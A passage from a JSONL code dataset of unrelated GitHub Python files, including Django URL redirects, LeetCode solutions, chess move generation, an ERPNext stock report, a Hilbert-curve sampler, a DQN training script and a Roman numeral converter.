url('^docs/reference_apps$',\n redirect_doc('/Web/Apps/Reference_apps'),\n name='ecosystem.build_reference'),\n url('^docs/apps/(?P\\w+)?$',\n lambda req, page:\n redirect_doc('/Web/Apps/Reference_apps/' + APP_SLUGS.get(page, ''),\n req),\n name='ecosystem.apps_documentation'),\n url('^docs/payments/status$',\n redirect_doc('/Mozilla/Marketplace/Payments_Status'),\n name='ecosystem.publish_payments'),\n url('^docs/tools$',\n redirect_doc('/Web/Apps/Quickstart/Build/App_tools'),\n name='ecosystem.build_tools'),\n url('^docs/app_generator$',\n redirect_doc('/Web/Apps/Developing/App_templates'),\n name='ecosystem.build_app_generator'),\n url('^docs/app_manager$',\n redirect_doc('/Mozilla/Firefox_OS/Using_the_App_Manager'),\n name='ecosystem.app_manager'),\n url('^docs/dev_tools$',\n redirect_doc('/Tools'),\n name='ecosystem.build_dev_tools'),\n\n # Doesn't start with docs/, but still redirects to MDN.\n url('^dev_phone$',\n redirect_doc('/Mozilla/Firefox_OS/Developer_phone_guide/Flame'),\n name='ecosystem.dev_phone'),\n)\n\n\nurlpatterns = redirect_patterns + patterns(\n '',\n url('^$', views.landing, name='ecosystem.landing'),\n url('^partners$', views.partners, name='ecosystem.partners'),\n url('^support$', views.support, name='ecosystem.support'),\n url('^docs/badges$', views.publish_badges, name='ecosystem.publish_badges')\n)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/ecosystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"3541711220","text":"# Import the pyparsing package for removing comments\nimport tokenize, io, re\n\n# Function to collect data from a given file\ndef dataFromFile(fileName) :\n\tf = open(fileName, 'r')\n\tdata = f.read()\n\tf.close()\n\treturn data\n\n# Function to remove comments from given source code\ndef rmComments(code) :\n\t# List to store uncommented part of code\n\tresult = []\n\t# Process each line for tokenizing it\n\tg = tokenize.generate_tokens(io.BytesIO(bytes(code)).readline)\n\tfor toknum, tokval, _, _, _ in g:\n\t\t# Remove corresponding token if it is a # comment\n\t\tif toknum != tokenize.COMMENT :\n\t\t\tresult.append((toknum, tokval))\n\t\n\t# Return the untokenized form of the so opbtained code\n\treturn tokenize.untokenize(result)\n\n# Function to remove empty lines from the code\ndef pruneCode(code) :\n\tcode = filter(lambda line: re.search(\"\\S\", line), code.split(\"\\n\"))\n\treturn \"\\n\".join(code)\n\n# Function to compline all necessary preprocessors together\ndef preprocess(code) :\n\tcode = rmComments(code)\n\tcode = pruneCode(code)\n\treturn code\n","repo_name":"rohit04saluja/micro-codes","sub_path":"python/SVV/Python/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41360730405","text":"class Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n map = {}\n res = 0\n i = 0\n for j in range(len(s)):\n map[s[j]] = map.get(s[j], 0) + 1\n\n if (j - i + 1) - max(map.values()) > k:\n map[s[i]] = map[s[i]] - 1\n i += 1\n\n res = max(res, j - i + 1)\n\n return res\n\n\n\n\n","repo_name":"msraychiu/MyPythonNeetcodeLearning","sub_path":"sliding_window/longest_repeating_character_replacement.py","file_name":"longest_repeating_character_replacement.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74995057681","text":"from abc import ABC, abstractmethod\nfrom typing import NamedTuple, List\nfrom models.square import Square\n\n\nclass DirectionVec(NamedTuple):\n file: int\n rank: int\n\n\nclass Directions:\n ORTHOGONAL = {\n 'North': DirectionVec(0,-1),\n 'South': DirectionVec(0,1),\n 'West': DirectionVec(-1,0),\n 'East': DirectionVec(1,0),\n }\n \n DIAGONAL = {\n 'Topleft': DirectionVec(-1,-1),\n 'Topright': DirectionVec(-1,1),\n 'Bottomleft': DirectionVec(1,-1),\n 'Bottomright': DirectionVec(1,1),\n }\n \n COMBINED = {**ORTHOGONAL, **DIAGONAL}\n \n KNIGHT = {\n 'TL': DirectionVec(-1,-2),\n 'TL2': DirectionVec(-2,-1),\n 'BL': DirectionVec(-2,1),\n 'BL2': DirectionVec(-1,2),\n 'TR': DirectionVec(1,-2),\n 'TR2': DirectionVec(2,-1),\n 'BR': DirectionVec(2,1),\n 'BR2': DirectionVec(1,2),\n }\n \n\nPIECE_ABBREVIATIONS = list(iter(\"BRQKN\"))\n\n\nclass Piece(ABC):\n directions = None\n abbreviation = None\n\n def __init__(self, square: Square, board):\n self.square = square\n self.board = board # reference to board object\n\n @abstractmethod\n def get_moves(self) -> List[Square]:\n pass\n\n\nclass SlidingPiece(Piece):\n def get_moves(self) -> List[Square]:\n moves = []\n\n for direction in self.directions.values():\n new_square = self.square # start from current square\n\n while True:\n new_file = new_square.file + direction.file\n new_rank = new_square.rank + direction.rank\n\n try:\n new_square = Square(new_file, new_rank)\n except ValueError:\n # we are out of bounds -> this square doesn't exist\n # move to next direction\n break\n\n # if square exists but its occupied -> move to next direction\n if new_square in self.board.occupied:\n break\n\n moves.append(new_square)\n\n return moves\n\n\nclass NonSlidingPiece(Piece):\n def get_moves(self) -> List[Square]:\n moves = []\n\n for direction in self.directions.values():\n new_file = self.square.file + direction.file\n new_rank = self.square.rank + direction.rank\n\n try:\n new_square = Square(new_file, new_rank)\n except ValueError:\n # we are out of bounds -> this square doesn't exist\n # move to next direction\n continue\n\n # if square exists but its occupied -> move to next direction\n if new_square in self.board.occupied:\n continue\n\n moves.append(new_square)\n\n return moves\n\n\nclass Bishop(SlidingPiece):\n directions = Directions.DIAGONAL\n abbreviation = \"B\"\n\n\nclass Rook(SlidingPiece):\n directions = Directions.ORTHOGONAL\n abbreviation = \"R\"\n \n\nclass Queen(SlidingPiece):\n directions = Directions.COMBINED\n abbreviation = \"Q\"\n\n\nclass King(NonSlidingPiece):\n directions = Directions.COMBINED\n abbreviation = \"K\"\n\n\nclass Knight(NonSlidingPiece):\n directions = Directions.KNIGHT\n abbreviation = \"N\"\n","repo_name":"AngelVI13/visu","sub_path":"src/models/pieces.py","file_name":"pieces.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72067585362","text":"from __future__ import unicode_literals\nimport frappe, erpnext\nfrom frappe import _\nfrom frappe.utils import has_common\nimport json\nfrom six import StringIO, string_types\nfrom datetime import date\nfrom frappe.utils import cstr, getdate, split_emails, add_days, today, get_last_day, get_first_day, month_diff, nowdate, cint, flt, date_diff\nfrom six import iteritems\nimport datetime\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport copy\n\ndef execute(filters=None):\n\tcolumns, data = get_columns(), get_data(filters)\n\treturn columns, data\n\t\ndef get_data(filters):\n\n\tif filters.get(\"company\"):\n\t\tcompany_currency = erpnext.get_company_currency(filters.get(\"company\"))\n\telse:\n\t\tcompany_currency = frappe.db.get_single_value(\"Global Defaults\", \"default_currency\")\n\n\titems = get_items(filters)\n\tsle = get_stock_ledger_entries(filters, items)\n\tiwb_map = get_item_warehouse_map(filters, sle)\n\n\titem_map = get_item_details(items, sle, filters)\n\titem_reorder_detail_map = get_item_reorder_details(item_map.keys())\n\tstock_qty=stock_qty_before_some_month(filters)\n\tdata = []\n\tconversion_factors = {}\n\n\t_func = lambda x: x[1]\n\n\tfor (company, item, warehouse) in sorted(iwb_map):\n\t\tif item_map.get(item):\n\t\t\tqty_dict = iwb_map[(company, item, warehouse)]\n\t\t\titem_reorder_level = 0\n\t\t\titem_reorder_qty = 0\n\t\t\tif item + warehouse in item_reorder_detail_map:\n\t\t\t\titem_reorder_level = item_reorder_detail_map[item + warehouse][\"warehouse_reorder_level\"]\n\t\t\t\titem_reorder_qty = item_reorder_detail_map[item + warehouse][\"warehouse_reorder_qty\"]\n\t\t\t\n\t\t\tlast_stock_updated_date=frappe.db.sql(\"\"\"SELECT item_code, posting_date from `tabStock Ledger Entry` where item_code='{0}' and company='{1}' and warehouse='{2}' ORDER BY posting_date DESC \"\"\".format(item, company, warehouse), as_dict=1)\n\n\t\t\tif item in stock_qty and stock_qty.get(item).get(\"warehouse\")==warehouse:\n\t\t\t\treport_data = {\n\t\t\t\t\t'currency': company_currency,\n\t\t\t\t\t'item_code': item,\n\t\t\t\t\t'warehouse': warehouse,\n\t\t\t\t\t'company': company,\n\t\t\t\t\t'reorder_level': item_reorder_level,\n\t\t\t\t\t'reorder_qty': item_reorder_qty,\n\t\t\t\t\t'last_stock_updated_date':last_stock_updated_date[0].get(\"posting_date\") if last_stock_updated_date[0] else \"\",\n\t\t\t\t\t'days_60':stock_qty.get(item).get(2, 0),\n\t\t\t\t\t'days_90':stock_qty.get(item).get(3, 0),\n\t\t\t\t\t'days_180':stock_qty.get(item).get(6, 0),\n\t\t\t\t\t'year_1':stock_qty.get(item).get(12, 0),\n\t\t\t\t\t'year_2':stock_qty.get(item).get(24, 0)\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\treport_data = {\n\t\t\t\t\t'currency': company_currency,\n\t\t\t\t\t'item_code': item,\n\t\t\t\t\t'warehouse': warehouse,\n\t\t\t\t\t'company': company,\n\t\t\t\t\t'reorder_level': item_reorder_level,\n\t\t\t\t\t'reorder_qty': item_reorder_qty,\n\t\t\t\t\t'last_stock_updated_date':last_stock_updated_date[0].get(\"posting_date\") if last_stock_updated_date[0] else \"\"\n\t\t\t\t}\n\n\n\t\t\treport_data.update(item_map[item])\n\t\t\treport_data.update(qty_dict)\n\t\t\tdata.append(report_data)\n\n\n\treturn data\n\n\ndef get_stock_ledger_entries(filters, items):\n\titem_conditions_sql = ''\n\tif items:\n\t\titem_conditions_sql = ' and sle.item_code in ({})'\\\n\t\t\t.format(', '.join([frappe.db.escape(i, percent=False) for i in items]))\n\n\tconditions = get_conditions(filters)\n\n\treturn frappe.db.sql(\"\"\"\n\t\tselect\n\t\t\tsle.item_code, warehouse, sle.posting_date, sle.actual_qty, sle.valuation_rate,\n\t\t\tsle.company, sle.voucher_type, sle.qty_after_transaction, sle.stock_value_difference,\n\t\t\tsle.item_code as name, sle.voucher_no, sle.stock_value, sle.name\n\t\tfrom\n\t\t\t`tabStock Ledger Entry` sle force index (posting_sort_index)\n\t\twhere sle.docstatus < 2 %s %s\n\t\torder by sle.posting_date, sle.posting_time, sle.creation, sle.actual_qty\"\"\" % #nosec\n\t\t(item_conditions_sql, conditions), as_dict=1)\n\n\ndef get_conditions(filters):\n\tconditions = \"\"\n\t# if not filters.get(\"from_date\"):\n\t# \tfrappe.throw(_(\"'From Date' is required\"))\n\n\t# if filters.get(\"to_date\"):\n\t# \tconditions += \" and sle.posting_date <= %s\" % frappe.db.escape(filters.get(\"to_date\"))\n\t# else:\n\t# \tfrappe.throw(_(\"'To Date' is required\"))\n\n\tif filters.get(\"company\"):\n\t\tconditions += \" and sle.company = %s\" % frappe.db.escape(filters.get(\"company\"))\n\n\tif filters.get(\"warehouse\"):\n\t\twarehouse_details = frappe.db.get_value(\"Warehouse\",\n\t\t\tfilters.get(\"warehouse\"), [\"lft\", \"rgt\"], as_dict=1)\n\t\tif warehouse_details:\n\t\t\tconditions += \" and exists (select name from `tabWarehouse` wh \\\n\t\t\t\twhere wh.lft >= %s and wh.rgt <= %s and sle.warehouse = wh.name)\"%(warehouse_details.lft,\n\t\t\t\twarehouse_details.rgt)\n\n\n\t# if filters.get(\"warehouse_type\") and not filters.get(\"warehouse\"):\n\t# \tconditions += \" and exists (select name from `tabWarehouse` wh \\\n\t# \t\twhere wh.warehouse_type = '%s' and sle.warehouse = wh.name)\"%(filters.get(\"warehouse_type\"))\n\n\treturn conditions\n\n\ndef get_item_warehouse_map(filters, sle):\n\tiwb_map = {}\n\tfrom_date = getdate(filters.get(\"from_date\"))\n\tto_date = getdate(filters.get(\"to_date\"))\n\n\tfloat_precision = cint(frappe.db.get_default(\"float_precision\")) or 3\n\n\tfor d in sle:\n\t\tkey = (d.company, d.item_code, d.warehouse)\n\t\tif key not in iwb_map:\n\t\t\tiwb_map[key] = frappe._dict({\n\t\t\t\t\"opening_qty\": 0.0, \"opening_val\": 0.0,\n\t\t\t\t\"in_qty\": 0.0, \"in_val\": 0.0,\n\t\t\t\t\"out_qty\": 0.0, \"out_val\": 0.0,\n\t\t\t\t\"bal_qty\": 0.0, \"bal_val\": 0.0,\n\t\t\t\t\"val_rate\": 0.0\n\t\t\t})\n\n\t\tqty_dict = iwb_map[(d.company, d.item_code, d.warehouse)]\n\t\tif d.voucher_type == \"Stock Reconciliation\":\n\t\t\tqty_diff = flt(d.qty_after_transaction) - flt(qty_dict.bal_qty)\n\t\telse:\n\t\t\tqty_diff = flt(d.actual_qty)\n\n\t\tvalue_diff = flt(d.stock_value_difference)\n\t\t# if d.posting_date < from_date:\n\t\t# \tqty_dict.opening_qty += qty_diff\n\t\t# \tqty_dict.opening_val += value_diff\n\n\t\t# elif d.posting_date >= from_date and d.posting_date <= to_date:\n\t\t# \tif flt(qty_diff, float_precision) >= 0:\n\t\t# \t\tqty_dict.in_qty += qty_diff\n\t\t# \t\tqty_dict.in_val += value_diff\n\t\t# \telse:\n\t\t# \t\tqty_dict.out_qty += abs(qty_diff)\n\t\t# \t\tqty_dict.out_val += abs(value_diff)\n\t\tqty_dict.val_rate = d.valuation_rate\n\t\tqty_dict.bal_qty += qty_diff\n\t\tqty_dict.bal_val += value_diff\n\tiwb_map = filter_items_with_no_transactions(iwb_map, float_precision)\n\n\treturn iwb_map\n\n\ndef filter_items_with_no_transactions(iwb_map, float_precision):\n\tfor (company, item, warehouse) in sorted(iwb_map):\n\t\tqty_dict = iwb_map[(company, item, warehouse)]\n\n\t\tno_transactions = True\n\t\tfor key, val in iteritems(qty_dict):\n\t\t\tval = flt(val, float_precision)\n\t\t\tqty_dict[key] = val\n\t\t\tif key != \"val_rate\" and val:\n\t\t\t\tno_transactions = False\n\n\t\tif no_transactions:\n\t\t\tiwb_map.pop((company, item, warehouse))\n\n\treturn iwb_map\n\ndef get_item_details(items, sle, filters):\n\titem_details = {}\n\tif not items:\n\t\titems = list(set([d.item_code for d in sle]))\n\n\tif not items:\n\t\treturn item_details\n\n\tcf_field = cf_join = \"\"\n\tif filters.get(\"include_uom\"):\n\t\tcf_field = \", ucd.conversion_factor\"\n\t\tcf_join = \"left join `tabUOM Conversion Detail` ucd on ucd.parent=item.name and ucd.uom=%s\" \\\n\t\t\t% frappe.db.escape(filters.get(\"include_uom\"))\n\n\tres = frappe.db.sql(\"\"\"\n\t\tselect\n\t\t\titem.name, item.item_name, item.description, item.item_group, item.brand, item.stock_uom %s\n\t\tfrom\n\t\t\t`tabItem` item\n\t\t\t%s\n\t\twhere\n\t\t\titem.name in (%s)\n\t\"\"\" % (cf_field, cf_join, ','.join(['%s'] *len(items))), items, as_dict=1)\n\n\tfor item in res:\n\t\titem_details.setdefault(item.name, item)\n\n\tif filters.get('show_variant_attributes', 0) == 1:\n\t\tvariant_values = get_variant_values_for(list(item_details))\n\t\titem_details = {k: v.update(variant_values.get(k, {})) for k, v in iteritems(item_details)}\n\n\treturn item_details\n\ndef get_item_reorder_details(items):\n\titem_reorder_details = frappe._dict()\n\n\tif items:\n\t\titem_reorder_details = frappe.db.sql(\"\"\"\n\t\t\tselect parent, warehouse, warehouse_reorder_qty, warehouse_reorder_level\n\t\t\tfrom `tabItem Reorder`\n\t\t\twhere parent in ({0})\n\t\t\"\"\".format(', '.join([frappe.db.escape(i, percent=False) for i in items])), as_dict=1)\n\n\treturn dict((d.parent + d.warehouse, d) for d in item_reorder_details)\n\n\ndef get_items(filters):\n\tconditions = []\n\tif filters.get(\"item_code\"):\n\t\tconditions.append(\"item.name=%(item_code)s\")\n\n\titems = []\n\tif conditions:\n\t\titems = frappe.db.sql_list(\"\"\"select name from `tabItem` item where {}\"\"\"\n\t\t\t.format(\" and \".join(conditions)), filters)\n\treturn items\n\ndef stock_qty_before_some_month(filters):\n\tmonths_list = [2, 3, 6, 12, 24]\n\tmonths_date = []\n\t# months_date.append(getdate(today()))\n\tfor row in months_list:\n\t\t_date = date.today() + relativedelta(months=-row)\n\t\tmonths_date.append(getdate(_date))\n\n\tnew_list = {}\n\tstock_dict = {}\n\tfor idx, v in enumerate(months_date):\n\t\tmonth_len = len(months_date)-1\n\t\tif month_len != idx:\n\t\t\tsle_qty = frappe.db.sql(\"\"\"select sle.item_code, sle.warehouse, sle.posting_date, ABS(sum(sle.actual_qty) - sum(sle.qty_after_transaction)) as bal_qty, sle.company from `tabStock Ledger Entry` sle where sle.company='{0}' and sle.posting_date BETWEEN '{1}' and '{2}' GROUP BY sle.item_code, sle.warehouse\"\"\".format(filters.get(\"company\"), months_date[idx+1], v), as_dict=1)\n\t\telse:\n\t\t\tsle_qty = frappe.db.sql(\"\"\"select distinct sle.item_code, sle.warehouse, sle.posting_date, ABS(sum(sle.actual_qty) - sum(sle.qty_after_transaction)) as bal_qty, sle.company from `tabStock Ledger Entry` sle where sle.company='{0}' and sle.posting_date < '{1}' GROUP BY sle.item_code, sle.warehouse\"\"\".format(filters.get(\"company\"), v), as_dict=1)\n\t\t\n\t\tfor row in sle_qty:\n\t\t\tif row.get(\"item_code\") in stock_dict:\n\t\t\t\td=stock_dict[row.get(\"item_code\")]\n\t\t\t\td[months_list[idx]]=row.get(\"bal_qty\")\n\t\t\t\tstock_dict[row.get(\"item_code\")]=d\n\t\t\telse:\n\t\t\t\trow[months_list[idx]]=row.get(\"bal_qty\")\n\t\t\t\tstock_dict[row.get(\"item_code\")] = row\n\n\treturn stock_dict\n\ndef get_columns():\n\treturn\t[\n\t\t{\n\t\t\t\"label\": _(\"Branch\"),\n\t\t\t\"fieldname\": \"company\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Warehouse\"),\n\t\t\t\"fieldname\": \"warehouse\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Book Code\"),\n\t\t\t\"fieldname\": \"item_code\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Book Description\"),\n\t\t\t\"fieldname\": \"description\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Last Stock Updated Date\"),\n\t\t\t\"fieldname\": \"last_stock_updated_date\",\n\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Available Stock\"),\n\t\t\t\"fieldname\": \"bal_qty\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"0-30 Days\"),\n\t\t\t\"fieldname\": \"bal_qty\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"60 Days\"),\n\t\t\t\"fieldname\": \"days_60\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"90 Days\"),\n\t\t\t\"fieldname\": \"days_90\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"180 Days\"),\n\t\t\t\"fieldname\": \"days_180\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"1 Year\"),\n\t\t\t\"fieldname\": \"year_1\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\">2 Year\"),\n\t\t\t\"fieldname\": \"year_2\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t}\n\t]","repo_name":"indictranstech/BBT-I2E","sub_path":"bbt_bpm/bbt_bpm/report/obsolescence_report/obsolescence_report.py","file_name":"obsolescence_report.py","file_ext":"py","file_size_in_byte":10901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23768332326","text":"import os\nimport unittest\nfrom datetime import datetime, date\nfrom pathlib import Path\n\n# from auto_terrarium_proj.Reading import Reading\nfrom .ReadingsDB import ReadingsDBController, DEFAULT_DB_FILE\nfrom web_monitor.models import Reading\n\ncurtime = datetime.now()\ntest_reading = Reading(curtime, 72, 44)\n\n\nclass TestReadingsDB(unittest.TestCase):\n\n def setUp(self):\n path = Path(DEFAULT_DB_FILE)\n if Path.exists(path):\n os.remove(DEFAULT_DB_FILE)\n\n def test_get_latest_reading(self):\n ReadingsDBController.create_readings_table('test.sqlite', reinit=True)\n db = ReadingsDBController('test.sqlite')\n\n db.write(test_reading)\n reading = db.get_latest_reading()\n\n self.assertEqual(reading.time, test_reading.time)\n self.assertEqual(reading.temperature, test_reading.temperature)\n self.assertEqual(reading.humidity, test_reading.humidity)\n\n ReadingsDBController.drop_readings_table('test.sqlite')\n\n def test_record_good_reading(self):\n ReadingsDBController.create_readings_table('test.sqlite', reinit=True)\n db = ReadingsDBController()\n\n db.write(test_reading)\n ReadingsDBController.drop_readings_table()\n\n\nclass TestReading(unittest.TestCase):\n\n def test_bad_time(self):\n self.skipTest(\"not implemented yet\")\n never = date.max\n reading = Reading(never, 72, 44)\n self.assertIsNone(reading, \"class Reading init accepted bad temp value\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tv-deusen/auto-terrarium","sub_path":"auto_terrarium/database/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40493283498","text":"##### Temperature Class #####\n\n# Create a Temperature class whose instances all contain a kelvin attribute. This class should also \n# contain two class attributes named min_temperature and max_temperature which can be modified by \n# calling the respective class methods named update_min_temperature and update_max_temperature.\n\n# min_temperature must always be less than max_temperature and each instances' kelvin attribute \n# must be between min_temperature and max_temperature, inclusively. Any instantiation or method \n# call that breaks the outlined constraints should raise an Exception.\n\n# Note: min_temperature should be initialized as 0 and max_temperature should be initialized as 1000.\n\n# See below for an example.\n\n# >>> t1 = Temperature(260)\n# >>> Temperature.update_max_temperature(270)\n# >>> Temperature.update_min_temperature(680)\n# Exception: Invalid temperature.\n# >>> t2 = Temperature(280)\n# Exception: Invalid temperature.\n# >>> Temperature.update_min_temperature(100)\n# >>> t3 = Temperature(120)\n# >>> Temperature.update_max_temperature(90)\n# Exception: Invalid temperature.\n\nclass Temperature:\n min_temperature = 0\n max_temperature = 1000\n\n def __init__(self, kelvin):\n if kelvin > self.max_temperature or kelvin < self.min_temperature:\n raise Exception(\"Invalid temperature.\")\n\n self.kelvin = kelvin\n\n @classmethod\n def update_min_temperature(cls, kelvin):\n if kelvin > cls.max_temperature:\n raise Exception(\"Invalid temperature.\")\n\n cls.min_temperature = kelvin\n\n @classmethod\n def update_max_temperature(cls, kelvin):\n if kelvin < cls.min_temperature:\n raise Exception(\"Invalid temperature.\")\n\n cls.max_temperature = kelvin","repo_name":"pochiman/ProgrammingExpert","sub_path":"03_Object-Oriented_Programming/05_Class_Methods_And_Attributes/question_6.py","file_name":"question_6.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34720825948","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass assem_code_UI(QMainWindow):\n def __init__(self):\n super().__init__()\n\n def init_UI(self, codes):\n self.setWindowTitle('汇编代码')\n self.resize(640, 640)\n widget = QWidget()\n self.setCentralWidget(widget)\n self.setWindowIcon(QIcon('./Img/logo.png'))\n layout = QHBoxLayout()\n text = QTextBrowser()\n layout.addWidget(text)\n widget.setLayout(layout)\n text.setFont(QFont('微软雅黑', 11))\n text.setLineWrapMode(0)\n text.setText(codes)\n","repo_name":"ColorCJY/Complier","sub_path":"assem_code_UI.py","file_name":"assem_code_UI.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23337265204","text":"# https://leetcode.com/problems/two-sum/\n\n# use dictionary to store a value and the index of each element in the list of int\n# O(n) time and O(n) space\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n for index, num in enumerate(nums):\n complement = target - num\n if complement in d:\n return [d[complement], index]\n d[num]=index","repo_name":"WayOfOne/leetcode_practice","sub_path":"2023/Week_1/Arrays_and_hashing/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39950471088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# python/hilbert_curve.py Author \"Nathan Wycoff \" Date 03.27.2019\n\n## Initialize a design along a hilbert curve. \n\nimport matplotlib.pyplot as plt\nplt.ion()\nfrom hilbertcurve.hilbertcurve import HilbertCurve\nimport numpy as np\n\ndef hc_design(N, P):\n \"\"\"\n Design along a Hilbert Curve in the P dimensional unit box with N many points.\n \"\"\"\n gamma = int(np.ceil(np.log2(N+1) / P))\n hilbert_curve = HilbertCurve(gamma, P)\n\n n_verts = 2**(gamma*P) - 1\n cube_slen = float(np.power(2, gamma))\n\n hc = hilbert_curve.coordinates_from_distance\n\n design = np.empty([N,P])\n for n in range(N):\n ind = float(n * n_verts) / float(N)\n xb = np.array(hc(int(np.floor(ind)))) / cube_slen \n xa = np.array(hc(int(np.ceil(ind)))) / cube_slen\n conv_coef = ind - np.floor(ind)\n design[n,:] = (1.0 - conv_coef) * xb + conv_coef * xa\n\n return(design)\n","repo_name":"NathanWycoff/gpnn","sub_path":"python/hilbert_curve.py","file_name":"hilbert_curve.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8497490152","text":"from DQN import DQN, DoubleDQN\n\n\nfrom utils.buffers import PreprocessAtari, FrameBuffer\nimport gym\nimport tensorflow as tf\n\nenv = gym.make(\"BreakoutDeterministic-v4\")\n\nenv = PreprocessAtari(env)\n\nenv = FrameBuffer(env)\n\ntf.reset_default_graph()\n\nsess = tf.InteractiveSession()\n\n# agent = DQN(env, sess, eps=0.85, max_buffer_size=100000, gamma=0.99,\n# lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True,\n# eps_decay=0.9995)\n\n# agent = NstepDQN(env, sess, eps=0.85, max_buffer_size=100000, gamma=0.99,\n# lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True,\n# eps_decay=0.9999,N=4)\n\n\nagent = DoubleDQN(env, sess, eps=0.5, max_buffer_size=100000, gamma=0.99,\n lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True, eps_decay=0.9999)\n\nsess.run(tf.global_variables_initializer())\n\nagent.run_episodes(10000, verbosity=1, eval=True, eval_freq=10, n_interact_2_evaluate=3)\n\nagent.close()\n\n\n","repo_name":"whiterabbitfollow/reinforcement_learning","sub_path":"DQN/runs/Atari_BreakoutDetermenistic.py","file_name":"Atari_BreakoutDetermenistic.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42483824403","text":"\"\"\"\nRoman numerals come from the ancient Roman numbering system. They are based on specific letters of the alphabet which\nare combined to signify the sum (or, in some cases, the difference) of their values. The first ten Roman numerals are:\n\nI, II, III, IV, V, VI, VII, VIII, IX, and X.\n\nThe Roman numeral system is decimal based, but not directly positional and does not include a zero. Roman numerals are\nbased on combinations of these seven symbols:\nNumeral\tValue\nI\t1 (unus)\nV\t5 (quinque)\nX\t10 (decem)\nL\t50 (quinquaginta)\nC\t100 (centum)\nD\t500 (quingenti)\nM\t1,000 (mille)\n\nMore additional information about Roman numerals can be found on the Wikipedia article.\n\nFor this task, you should return a Roman numeral using the specified integer value ranging from 1 to 3999.\n\nInput: A number as an integer.\n\nOutput: The Roman numeral as a string.\n\"\"\"\n\n\ndef roman_decode(number: int, first: str, second: str, third: str) -> str:\n main = ''\n additional = ''\n if number > 8:\n main = third\n additional = first\n elif 3 < number < 9:\n main = second\n additional = first\n elif number < 4:\n main = ''\n additional = first\n if number == 10 or number == 5:\n return main\n elif number == 9 or number == 4:\n return additional + main\n elif number == 8 or number == 3:\n return main + additional + additional + additional\n elif number == 7 or number == 2:\n return main + additional + additional\n elif number == 6 or number == 1:\n return main + additional\n\n\ndef checkio(data: int) -> str:\n result = ''\n if data // 1000:\n result += roman_decode(data // 1000, 'M', 'Z', 'Y')\n if data % 1000 // 100:\n result += roman_decode(data % 1000 // 100, 'C', 'D', 'M')\n if data % 100 // 10:\n result += roman_decode(data % 100 // 10, 'X', 'L', 'C')\n if data % 10:\n result += roman_decode(data % 10, 'I', 'V', 'X')\n return result\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(6) == 'VI', '6'\n assert checkio(76) == 'LXXVI', '76'\n assert checkio(499) == 'CDXCIX', '499'\n assert checkio(3888) == 'MMMDCCCLXXXVIII', '3888'\n print('Done! Go 